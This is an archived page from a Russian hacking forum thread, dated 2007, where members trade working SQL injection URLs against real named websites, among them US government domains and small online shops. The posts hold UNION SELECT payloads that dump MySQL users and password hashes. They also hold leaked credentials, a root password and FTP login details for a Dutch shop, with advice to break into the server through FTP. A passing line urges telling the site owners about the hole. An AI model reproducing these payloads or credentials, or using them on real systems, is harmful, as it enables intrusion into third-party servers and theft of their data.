ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2881  
Старый 19.08.2007, 13:37
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

.gov:
Код:
http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-77+union+select+version(),user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
 
Ответить с цитированием

  #2882  
Старый 19.08.2007, 18:46
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.arsenal-electro.ru/inc.php?include=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x17),0x17),3,4+from+users/*
не могу подобрать название колонки с паролями
 
Ответить с цитированием

  #2883  
Старый 20.08.2007, 02:44
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

Давно сюда не заглядывал, антибаян чекед =)
Код:
http://www.business-ua.com/icard2.phtml?id=-111+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),%20%200x71),0x71),4+from+mysql.user/*
root:crystaldragon
 
Ответить с цитированием

  #2884  
Старый 20.08.2007, 23:03
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Кроме version(),user, password дальше не могу ничего подобрать

код:

http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
 
Ответить с цитированием

  #2885  
Старый 20.08.2007, 23:23
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от fobofob  
Кроме version(),user, password дальше не могу ничего подобрать

код:

http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
мона еще хеш админа вытащить...
Код:
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
 
Ответить с цитированием

  #2886  
Старый 20.08.2007, 23:31
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!!!
ftp://www.kleijngeng.nl/ с такими данными пользователь - kleijnnl пароль - gifts4all
Зря сам не докопал. Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.

Последний раз редактировалось Red_Red1; 20.08.2007 в 23:33..
 
Ответить с цитированием

  #2887  
Старый 20.08.2007, 23:50
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.ipages.ru/index.php?id=9999+union+select+1,2,database()/*
помогите ето-нить, не могу таблицы подобрать
P.S. Сори за оффтоп киньте ссылку на базу названий таблиц для брутеры
 
Ответить с цитированием

  #2888  
Старый 21.08.2007, 00:12
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

2 Termin@L Тама есть АКТИВНАЯ ХСС в форуме, может поможет. А таблицы я тоже подобрать не смог.... пока не смог.
 
Ответить с цитированием

  #2889  
Старый 21.08.2007, 05:45
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

senate.michigan.gov
Код:
http://www.senate.michigan.gov/dem/transcript.php?id=-52%27+union+select+1,2,3,4,5,version(),concat_ws(0x3a,user,password),8,9,10,11,12+from+mysql.user+limit+0,1/*
 
Ответить с цитированием

  #2890  
Старый 21.08.2007, 08:09
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Цитата:
Сообщение от Red_Red1  
union+select+1,username,3,4,5,6+from+user/*
Вот это даст имя пользователя, это если ты не подобрал колонку.
Пароль ты нашел. Теперь лезь на фтп и рутай все это дело.
Я проверил работает!! Все было просто. Я если не нахожу админку всегда пробую фтп.
удачи.
З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
я знал имя юзера,а вот что на фтп можно залезть не догадался ),я ведь только учусь... И все это на смарте,так как компа нет спасибо за разъяснение! p.s напишите кто нить им,кто знает английский,что у них дыра,я не смогу т.к плохо знаю язык,скорее понимаю интуитивно p.p.s Red_Red1,я не собирался дефейсить,просто интересен процесс добывания паролей и т.д и т. п
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ